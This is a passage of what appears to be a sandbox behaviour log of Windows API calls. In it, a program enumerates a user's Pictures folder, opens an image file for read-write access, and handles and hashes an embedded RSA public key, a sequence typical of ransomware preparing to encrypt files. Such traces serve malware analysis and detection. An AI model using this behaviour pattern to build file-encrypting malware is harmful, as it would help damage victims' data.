lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0193.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.351] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\E5UCc4GR1Z tMgYPe\\") returned="E5UCc4GR1Z tMgYPe\\" [0193.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0193.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a08 [0193.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.351] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\") returned="ymOmNEPhoB\\" [0193.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41f50 [0193.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0193.352] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\") returned="Pictures\\" [0193.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41f50 | out: hHeap=0x6a0000) returned 1 [0193.352] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0193.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0193.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.352] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0193.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0193.353] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0193.353] PathFindFileNameW (pszPath="") returned="" [0193.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.353] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\E5UCc4GR1Z tMgYPe\\*" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\e5ucc4gr1z tmgype\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68188070, ftCreationTime.dwHighDateTime=0x1d898ad, ftLastAccessTime.dwLowDateTime=0x78909240, ftLastAccessTime.dwHighDateTime=0x1d8a009, ftLastWriteTime.dwLowDateTime=0x78909240, ftLastWriteTime.dwHighDateTime=0x1d8a009, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0193.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.356] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68188070, ftCreationTime.dwHighDateTime=0x1d898ad, ftLastAccessTime.dwLowDateTime=0x78909240, ftLastAccessTime.dwHighDateTime=0x1d8a009, ftLastWriteTime.dwLowDateTime=0x78909240, ftLastWriteTime.dwHighDateTime=0x1d8a009, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0193.356] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ea511b0, ftCreationTime.dwHighDateTime=0x1d8a220, ftLastAccessTime.dwLowDateTime=0xfccc5390, ftLastAccessTime.dwHighDateTime=0x1d8a4d8, ftLastWriteTime.dwLowDateTime=0xfccc5390, ftLastWriteTime.dwHighDateTime=0x1d8a4d8, nFileSizeHigh=0x0, nFileSizeLow=0x53a7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4uY5fsSdcyjSgJ.jpg", cAlternateFileName="4UY5FS~1.JPG")) returned 1 [0193.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xbe) returned 0x2c5b3e8 [0193.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.357] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\E5UCc4GR1Z tMgYPe\\4uY5fsSdcyjSgJ.jpg") returned=".jpg" [0193.357] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\E5UCc4GR1Z tMgYPe\\4uY5fsSdcyjSgJ.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\e5ucc4gr1z tmgype\\4uy5fssdcyjsgj.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0193.357] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=21415) returned 1 [0193.357] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0193.360] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5381, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.360] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0193.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.363] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.363] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x53a7, lpOverlapped=0x0) returned 1 [0193.364] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0193.364] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.364] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.364] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6e9a40) returned 1 [0193.365] CryptCreateHash (in: hProv=0x6e9a40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0193.365] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.365] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0193.365] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0193.365] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0193.365] GetLastError () returned 0x0 [0193.365] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0193.365] CryptReleaseContext (hProv=0x6e9a40, dwFlags=0x0) returned 1 [0193.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0193.366] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0193.366] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0193.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0193.366] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0193.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x53b0) returned 0x2d49778 [0193.366] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0193.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0193.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0193.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0193.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0193.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41f50 [0193.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e68 [0193.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41f98 [0193.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e80 [0193.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39eb0 [0193.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f10 [0193.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ec8 [0193.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0193.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0193.367] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0193.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0193.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39eb0 | out: hHeap=0x6a0000) returned 1 [0193.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ec8 | out: hHeap=0x6a0000) returned 1 [0193.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f10 | out: hHeap=0x6a0000) returned 1 [0193.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0193.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f10 [0193.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0193.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ec8 [0193.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0193.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39eb0 [0193.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0193.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0193.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0193.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0193.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0193.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0193.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0193.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0193.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ec8 | out: hHeap=0x6a0000) returned 1 [0193.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39eb0 | out: hHeap=0x6a0000) returned 1 [0193.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0193.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0193.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f10 | out: hHeap=0x6a0000) returned 1 [0193.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0193.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0193.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0193.370] GetCurrentThreadId () returned 0x264 [0193.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0193.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d45af0 [0193.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84be0 [0193.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0193.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0193.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0193.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0193.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.371] GetCurrentThreadId () returned 0x264 [0193.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2c31700 [0193.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.372] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0193.372] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0193.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0193.372] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0193.372] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0193.372] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0193.372] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0193.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f10 [0193.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0193.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0193.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0193.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0193.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0193.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0193.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0193.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39eb0 [0193.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0193.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0193.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0193.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0193.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0193.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0193.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ec8 [0193.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0193.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0193.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0193.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e98 [0193.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0193.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f28 [0193.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0193.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ef8 [0193.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 